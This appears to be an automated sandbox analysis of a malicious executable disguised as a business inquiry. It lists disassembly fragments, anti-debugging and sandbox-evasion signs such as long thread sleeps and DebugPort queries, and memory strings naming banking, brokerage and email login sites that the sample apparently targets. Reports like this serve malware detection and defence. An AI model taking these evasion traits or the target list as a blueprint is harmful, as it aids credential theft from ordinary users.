              Source: Binary string: wntdll.pdbUGP source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1569694869.000000000131F000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.000000000166E000.00000040.00001000.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000003.1567553117.0000000001047000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000A.00000003.1666491001.0000000003525000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000003.1663813416.0000000003379000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.000000000386E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.00000000036D0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: CSZ inquiry for MH raw material.exe, CSZ inquiry for MH raw material.exe, 00000000.00000003.1569694869.000000000131F000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.000000000166E000.00000040.00001000.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000003.1567553117.0000000001047000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 0000000A.00000003.1666491001.0000000003525000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000003.1663813416.0000000003379000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.000000000386E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.00000000036D0000.00000040.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E790BB pushad ; iretd 0_2_00E790E4
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E73863 push ss; iretd 0_2_00E73880
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E63490 push eax; ret 0_2_00E63492
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E74DC4 pushfd ; retf 0_2_00E74DCE
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014D225F pushad ; ret 0_2_014D27F9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014D27FA pushad ; ret 0_2_014D27F9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015009AD push ecx; mov dword ptr [esp], ecx0_2_015009B6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014D283D push eax; iretd 0_2_014D2858
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014D135E push eax; iretd 0_2_014D1369
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039B7BD2 pushad ; iretd 9_2_039B7BFB
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039BDB13 push ecx; ret 9_2_039BDB14
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039BD938 push FFFFFFADh; ret 9_2_039BD93A
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039B38DB pushfd ; retf 9_2_039B38E5
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039BCFBB push cs; retf 9_2_039BCFC4
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037009AD push ecx; mov dword ptr [esp], ecx10_2_037009B6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EBB011 push cs; retf 10_2_02EBB01A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EBBB69 push ecx; ret 10_2_02EBBB6A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EBB98E push FFFFFFADh; ret 10_2_02EBB990
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EB1931 pushfd ; retf 10_2_02EB193B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EB5C28 pushad ; iretd 10_2_02EB5C51
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EBDD8B push eax; iretd 10_2_02EBDDEC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352B3C4 push edi; ret 10_2_0352B445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352B3C8 push edi; ret 10_2_0352B445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03535202 push eax; ret 10_2_03535204
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_035271EA push es; ret 10_2_035271EB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352C033 push ss; iretd 10_2_0352C036
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352BA5F push cs; retf 10_2_0352BA67
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352AE60 push ds; retf 10_2_0352AE61
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056DFFDC push 1537E110h; ret 11_2_056DFFE4
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056E5EED push cs; retf 11_2_056E5EF6
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056E686A push FFFFFFADh; ret 11_2_056E686C
              Source: CSZ inquiry for MH raw material.exeStatic PE information: section name: .text entropy: 7.995275199427175
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0154096E rdtsc 0_2_0154096E
              Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 1800
              Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 8172
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 2.7 %
              Source: C:\Windows\SysWOW64\fc.exe TID: 6356Thread sleep count: 1800 > 30
              Source: C:\Windows\SysWOW64\fc.exe TID: 6356Thread sleep time: -3600000s >= -30000s
              Source: C:\Windows\SysWOW64\fc.exe TID: 6356Thread sleep count: 8172 > 30
              Source: C:\Windows\SysWOW64\fc.exe TID: 6356Thread sleep time: -16344000s >= -30000s
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe TID: 6828Thread sleep time: -40000s >= -30000s
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EBC870 FindFirstFileW,FindNextFileW,FindClose,10_2_02EBC870
              Source: 17O3k-2I.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: 17O3k-2I.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: 17O3k-2I.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: 17O3k-2I.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: 17O3k-2I.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: 17O3k-2I.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: AMC password management pageVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: mSWyWMUGFWJCYT.exe, 0000000B.00000002.2507285876.000000000126F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
              Source: 17O3k-2I.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: 17O3k-2I.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: 17O3k-2I.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: 17O3k-2I.10.drBinary or memory string: discord.comVMware20,11696492231f
              Source: fc.exe, 0000000A.00000002.2505857523.0000000003280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: 17O3k-2I.10.drBinary or memory string: global block list test formVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: 17O3k-2I.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: 17O3k-2I.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: 17O3k-2I.10.drBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: 17O3k-2I.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: 17O3k-2I.10.drBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: 17O3k-2I.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: 17O3k-2I.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: 17O3k-2I.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: 17O3k-2I.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: 17O3k-2I.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: firefox.exe, 0000000D.00000002.1963999164.00000299A7A8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLL
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E77CA3 LdrLoadDll,0_2_00E77CA3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D634F mov eax, dword ptr fs:[00000030h]0_2_015D634F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A437C mov eax, dword ptr fs:[00000030h]0_2_015A437C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01520310 mov ecx, dword ptr fs:[00000030h]0_2_01520310
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153A30B mov eax, dword ptr fs:[00000030h]0_2_0153A30B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153A30B mov eax, dword ptr fs:[00000030h]0_2_0153A30B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153A30B mov eax, dword ptr fs:[00000030h]0_2_0153A30B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FC310 mov ecx, dword ptr fs:[00000030h]0_2_014FC310
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D8324 mov eax, dword ptr fs:[00000030h]0_2_015D8324
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D8324 mov ecx, dword ptr fs:[00000030h]0_2_015D8324
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D8324 mov eax, dword ptr fs:[00000030h]0_2_015D8324
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D8324 mov eax, dword ptr fs:[00000030h]0_2_015D8324
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE3DB mov eax, dword ptr fs:[00000030h]0_2_015AE3DB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE3DB mov eax, dword ptr fs:[00000030h]0_2_015AE3DB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE3DB mov ecx, dword ptr fs:[00000030h]0_2_015AE3DB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE3DB mov eax, dword ptr fs:[00000030h]0_2_015AE3DB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A43D4 mov eax, dword ptr fs:[00000030h]0_2_015A43D4
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A43D4 mov eax, dword ptr fs:[00000030h]0_2_015A43D4
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015083C0 mov eax, dword ptr fs:[00000030h]0_2_015083C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015083C0 mov eax, dword ptr fs:[00000030h]0_2_015083C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015083C0 mov eax, dword ptr fs:[00000030h]0_2_015083C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015083C0 mov eax, dword ptr fs:[00000030h]0_2_015083C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015BC3CD mov eax, dword ptr fs:[00000030h]0_2_015BC3CD
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015863C0 mov eax, dword ptr fs:[00000030h]0_2_015863C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151E3F0 mov eax, dword ptr fs:[00000030h]0_2_0151E3F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151E3F0 mov eax, dword ptr fs:[00000030h]0_2_0151E3F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151E3F0 mov eax, dword ptr fs:[00000030h]0_2_0151E3F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015363FF mov eax, dword ptr fs:[00000030h]0_2_015363FF
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FE388 mov eax, dword ptr fs:[00000030h]0_2_014FE388
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FE388 mov eax, dword ptr fs:[00000030h]0_2_014FE388
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FE388 mov eax, dword ptr fs:[00000030h]0_2_014FE388
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014F8397 mov eax, dword ptr fs:[00000030h]0_2_014F8397
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014F8397 mov eax, dword ptr fs:[00000030h]0_2_014F8397
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014F8397 mov eax, dword ptr fs:[00000030h]0_2_014F8397
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152438F mov eax, dword ptr fs:[00000030h]0_2_0152438F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152438F mov eax, dword ptr fs:[00000030h]0_2_0152438F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D625D mov eax, dword ptr fs:[00000030h]0_2_015D625D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01506259 mov eax, dword ptr fs:[00000030h]0_2_01506259
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015BA250 mov eax, dword ptr fs:[00000030h]0_2_015BA250
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015BA250 mov eax, dword ptr fs:[00000030h]0_2_015BA250
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01588243 mov eax, dword ptr fs:[00000030h]0_2_01588243
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01588243 mov ecx, dword ptr fs:[00000030h]0_2_01588243
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FA250 mov eax, dword ptr fs:[00000030h]0_2_014FA250
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014F826B mov eax, dword ptr fs:[00000030h]0_2_014F826B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01504260 mov eax, dword ptr fs:[00000030h]0_2_01504260
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01504260 mov eax, dword ptr fs:[00000030h]0_2_01504260
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01504260 mov eax, dword ptr fs:[00000030h]0_2_01504260
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014F823B mov eax, dword ptr fs:[00000030h]0_2_014F823B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D62D6 mov eax, dword ptr fs:[00000030h]0_2_015D62D6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A2C3 mov eax, dword ptr fs:[00000030h]0_2_0150A2C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A2C3 mov eax, dword ptr fs:[00000030h]0_2_0150A2C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A2C3 mov eax, dword ptr fs:[00000030h]0_2_0150A2C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A2C3 mov eax, dword ptr fs:[00000030h]0_2_0150A2C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A2C3 mov eax, dword ptr fs:[00000030h]0_2_0150A2C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015102E1 mov eax, dword ptr fs:[00000030h]0_2_015102E1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015102E1 mov eax, dword ptr fs:[00000030h]0_2_015102E1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015102E1 mov eax, dword ptr fs:[00000030h]0_2_015102E1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153E284 mov eax, dword ptr fs:[00000030h]0_2_0153E284
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153E284 mov eax, dword ptr fs:[00000030h]0_2_0153E284
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01580283 mov eax, dword ptr fs:[00000030h]0_2_01580283
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01580283 mov eax, dword ptr fs:[00000030h]0_2_01580283
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01580283 mov eax, dword ptr fs:[00000030h]0_2_01580283
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015102A0 mov eax, dword ptr fs:[00000030h]0_2_015102A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015102A0 mov eax, dword ptr fs:[00000030h]0_2_015102A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015962A0 mov eax, dword ptr fs:[00000030h]0_2_015962A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015962A0 mov ecx, dword ptr fs:[00000030h]0_2_015962A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015962A0 mov eax, dword ptr fs:[00000030h]0_2_015962A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015962A0 mov eax, dword ptr fs:[00000030h]0_2_015962A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015962A0 mov eax, dword ptr fs:[00000030h]0_2_015962A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015962A0 mov eax, dword ptr fs:[00000030h]0_2_015962A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01508550 mov eax, dword ptr fs:[00000030h]0_2_01508550
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01508550 mov eax, dword ptr fs:[00000030h]0_2_01508550
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153656A mov eax, dword ptr fs:[00000030h]0_2_0153656A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153656A mov eax, dword ptr fs:[00000030h]0_2_0153656A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153656A mov eax, dword ptr fs:[00000030h]0_2_0153656A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01596500 mov eax, dword ptr fs:[00000030h]0_2_01596500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D4500 mov eax, dword ptr fs:[00000030h]0_2_015D4500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D4500 mov eax, dword ptr fs:[00000030h]0_2_015D4500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D4500 mov eax, dword ptr fs:[00000030h]0_2_015D4500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D4500 mov eax, dword ptr fs:[00000030h]0_2_015D4500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D4500 mov eax, dword ptr fs:[00000030h]0_2_015D4500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D4500 mov eax, dword ptr fs:[00000030h]0_2_015D4500
